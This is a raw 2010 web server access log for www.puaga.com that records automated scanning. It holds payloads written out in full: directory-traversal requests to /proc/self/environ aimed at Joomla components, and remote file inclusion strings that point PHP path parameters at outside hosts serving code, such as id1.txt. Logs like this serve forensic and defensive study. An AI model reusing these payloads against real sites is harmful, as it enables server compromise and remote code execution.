99.198.119.90 - - [31/Jul/2010:09:02:30 -0700] "GET /logs/access_100716.log//index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
99.198.119.90 - - [31/Jul/2010:09:02:31 -0700] "GET /index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.833" "www.puaga.com"
99.198.119.90 - - [31/Jul/2010:09:02:31 -0700] "GET /logs//index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
202.160.123.72 - - [31/Jul/2010:09:02:31 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
99.198.119.90 - - [31/Jul/2010:09:02:37 -0700] "GET /logs/access_100716.log//index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
99.198.119.90 - - [31/Jul/2010:09:02:38 -0700] "GET /index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.833" "www.puaga.com"
99.198.119.90 - - [31/Jul/2010:09:02:38 -0700] "GET /logs//index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:02:45 -0700] "GET /logs/access_100711.log//index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:02:45 -0700] "GET /index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.831" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:02:45 -0700] "GET /logs//index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:03:00 -0700] "GET /logs/access_100630.log//index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:03:00 -0700] "GET /index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.831" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:03:00 -0700] "GET /logs//index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.46.28.75 - - [31/Jul/2010:09:03:07 -0700] "GET /logs/access_100606.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tehuurinutrecht.nl/cache/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:03:10 -0700] "GET /logs/access_100711.log//index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.46.28.75 - - [31/Jul/2010:09:03:13 -0700] "GET /logs/access_100507.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tehuurinutrecht.nl/cache/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:03:27 -0700] "GET /logs/access_100711.log//index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.46.28.75 - - [31/Jul/2010:09:03:32 -0700] "GET /logs/access_100606.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tehuurinutrecht.nl/cache/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.28.75 - - [31/Jul/2010:09:03:32 -0700] "GET /logs/access_100507.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tehuurinutrecht.nl/cache/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.28.75 - - [31/Jul/2010:09:03:32 -0700] "GET /logs/access_100606.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tehuurinutrecht.nl/cache/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.28.75 - - [31/Jul/2010:09:03:39 -0700] "GET /logs/access_100507.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tehuurinutrecht.nl/cache/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:03:48 -0700] "GET /index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.831" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:04:29 -0700] "GET /index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.831" "www.puaga.com"
202.160.123.72 - - [31/Jul/2010:09:04:31 -0700] "GET /logs/access_100716.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
78.46.28.75 - - [31/Jul/2010:09:04:31 -0700] "GET /logs/access_100606.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tehuurinutrecht.nl/cache/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.160.123.72 - - [31/Jul/2010:09:04:31 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.805" "www.puaga.com"
202.160.123.72 - - [31/Jul/2010:09:04:32 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
78.46.28.75 - - [31/Jul/2010:09:04:36 -0700] "GET /logs/access_100507.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tehuurinutrecht.nl/cache/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.160.123.72 - - [31/Jul/2010:09:05:39 -0700] "GET /logs/access_100710.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:06:37 -0700] "POST /logs/access_100704.log/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:06:37 -0700] "POST /logs/contact.php HTTP/1.0" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:06:38 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:06:38 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:06:38 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:06:39 -0700] "POST /logs/access_100704.log/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:06:39 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:06:39 -0700] "POST /logs/access_100704.log/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:06:39 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:06:40 -0700] "POST /logs/access_100704.log/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:06:40 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:06:41 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
203.147.62.92 - - [31/Jul/2010:09:06:45 -0700] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
203.147.62.92 - - [31/Jul/2010:09:06:46 -0700] "GET /logs/access_100320.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.147.62.92 - - [31/Jul/2010:09:06:46 -0700] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 200 25682 "-" "Mozilla/5.0" "www.puaga.com"
203.147.62.92 - - [31/Jul/2010:09:07:03 -0700] "GET /logs/access_100311.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:07:15 -0700] "GET /logs/access_100711.log//index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:07:15 -0700] "GET /index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.831" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:07:21 -0700] "GET /logs/access_100709.log//index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:07:32 -0700] "GET /index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.831" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:07:32 -0700] "GET /logs//index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
75.136.121.230 - - [31/Jul/2010:09:07:50 -0700] "GET /logs/access_100709.log//?_PHPLIB[libdir]=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.136.121.230 - - [31/Jul/2010:09:07:58 -0700] "GET /logs/access_100509.log//?_PHPLIB[libdir]=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.215.178.34 - - [31/Jul/2010:09:08:10 -0700] "GET /pingserver.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.puaga.com"
213.189.27.130 - - [31/Jul/2010:09:08:47 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
213.189.27.130 - - [31/Jul/2010:09:08:47 -0700] "POST /logs/access_100719.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
213.189.27.130 - - [31/Jul/2010:09:08:47 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
202.160.123.72 - - [31/Jul/2010:09:08:58 -0700] "GET /logs/access_100711.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
75.136.121.230 - - [31/Jul/2010:09:08:59 -0700] "GET /logs/access_100709.log//?_PHPLIB[libdir]=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:09:11 -0700] "GET /index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.831" "www.puaga.com"
75.136.121.230 - - [31/Jul/2010:09:09:16 -0700] "GET /logs/access_100509.log//?_PHPLIB[libdir]=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:09:17 -0700] "GET /index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.831" "www.puaga.com"
114.108.176.9 - - [31/Jul/2010:09:10:03 -0700] "GET /logs//include/footer.php?_path[counter]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.176.9 - - [31/Jul/2010:09:10:03 -0700] "GET /include/footer.php?_path[counter]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.176.9 - - [31/Jul/2010:09:10:03 -0700] "GET /logs/access_100628.log%20%20//include/footer.php?_path[counter]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:10:08 -0700] "GET /index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.831" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:10:18 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:10:18 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:10:19 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:10:19 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
114.108.176.9 - - [31/Jul/2010:09:10:19 -0700] "GET /include/footer.php?_path[counter]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.176.9 - - [31/Jul/2010:09:10:19 -0700] "GET /logs//include/footer.php?_path[counter]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.176.9 - - [31/Jul/2010:09:10:19 -0700] "GET /logs/access_100628.log%20%20//include/footer.php?_path[counter]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:10:19 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:10:19 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:10:20 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:10:20 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:10:20 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:10:21 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:10:21 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:10:22 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
213.189.27.130 - - [31/Jul/2010:09:10:23 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
213.189.27.130 - - [31/Jul/2010:09:10:23 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:10:23 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
213.189.27.130 - - [31/Jul/2010:09:10:23 -0700] "POST /logs/access_100719.log/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:10:23 -0700] "GET /index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.831" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:10:24 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:10:25 -0700] "GET /logs/access_100716.log//index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:10:26 -0700] "GET /index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.831" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:10:26 -0700] "GET /logs//index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
70.38.11.39 - - [31/Jul/2010:09:10:40 -0700] "GET /logs/access_100604.log%20%20//index.php?option=com_datsogallery&Itemid=&mosConfig.absolute.path=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.38.11.39 - - [31/Jul/2010:09:10:40 -0700] "GET /logs//index.php?option=com_datsogallery&Itemid=&mosConfig.absolute.path=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.38.11.39 - - [31/Jul/2010:09:10:40 -0700] "GET /index.php?option=com_datsogallery&Itemid=&mosConfig.absolute.path=http://www.irishtoothache.com/ver1? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
70.38.11.39 - - [31/Jul/2010:09:10:44 -0700] "GET /logs/access_100714.log%20%20//index.php?option=com_datsogallery&Itemid=&mosConfig.absolute.path=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.176.9 - - [31/Jul/2010:09:10:44 -0700] "GET /logs/access_100704.log%20%20//include/footer.php?_path[counter]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.176.9 - - [31/Jul/2010:09:10:56 -0700] "GET /logs/access_100704.log%20%20//include/footer.php?_path[counter]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.38.11.39 - - [31/Jul/2010:09:11:22 -0700] "GET /logs/access_100604.log//index.php?option=com_datsogallery&Itemid=&mosConfig.absolute.path=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.38.11.39 - - [31/Jul/2010:09:11:22 -0700] "GET /logs/access_100714.log//index.php?option=com_datsogallery&Itemid=&mosConfig.absolute.path=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.27.130 - - [31/Jul/2010:09:12:29 -0700] "POST /logs/access_100716.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:13:11 -0700] "GET /index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.831" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:13:14 -0700] "GET /logs/access_100716.log//index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
114.108.176.9 - - [31/Jul/2010:09:13:25 -0700] "GET /logs/access_100628.log//include/footer.php?_path[counter]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.176.9 - - [31/Jul/2010:09:13:35 -0700] "GET /logs/access_100628.log//include/footer.php?_path[counter]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:13:39 -0700] "GET /index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.831" "www.puaga.com"
213.189.27.130 - - [31/Jul/2010:09:13:41 -0700] "POST /logs/access_100716.log/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:13:43 -0700] "GET /index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.831" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:13:51 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:13:51 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:13:51 -0700] "POST /logs/access_100704.log/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:13:52 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:13:52 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:13:52 -0700] "POST /logs/access_100704.log/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:13:53 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:13:53 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:13:53 -0700] "POST /logs/access_100704.log/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:13:53 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:13:53 -0700] "POST /logs/access_100704.log/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:09:13:53 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
114.108.176.9 - - [31/Jul/2010:09:13:57 -0700] "GET /logs/access_100704.log//include/footer.php?_path[counter]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.147.62.92 - - [31/Jul/2010:09:15:13 -0700] "GET /logs/access_100604.log%20%20//index.php?option=com_datsogallery&Itemid=&mosConfig.absolute.path=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.147.62.92 - - [31/Jul/2010:09:15:13 -0700] "GET /index.php?option=com_datsogallery&Itemid=&mosConfig.absolute.path=http://www.irishtoothache.com/ver1? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
203.147.62.92 - - [31/Jul/2010:09:15:13 -0700] "GET /logs//index.php?option=com_datsogallery&Itemid=&mosConfig.absolute.path=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.147.62.92 - - [31/Jul/2010:09:15:23 -0700] "GET /logs/access_100714.log%20%20//index.php?option=com_datsogallery&Itemid=&mosConfig.absolute.path=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:15:59 -0700] "GET /index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.831" "www.puaga.com"
203.147.62.92 - - [31/Jul/2010:09:17:12 -0700] "GET /logs/access_100221.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.147.62.92 - - [31/Jul/2010:09:17:13 -0700] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 200 25682 "-" "Mozilla/5.0" "www.puaga.com"
203.147.62.92 - - [31/Jul/2010:09:17:13 -0700] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:17:28 -0700] "GET /logs/access_100707.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:17:28 -0700] "GET /logs/access_100707.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:17:29 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
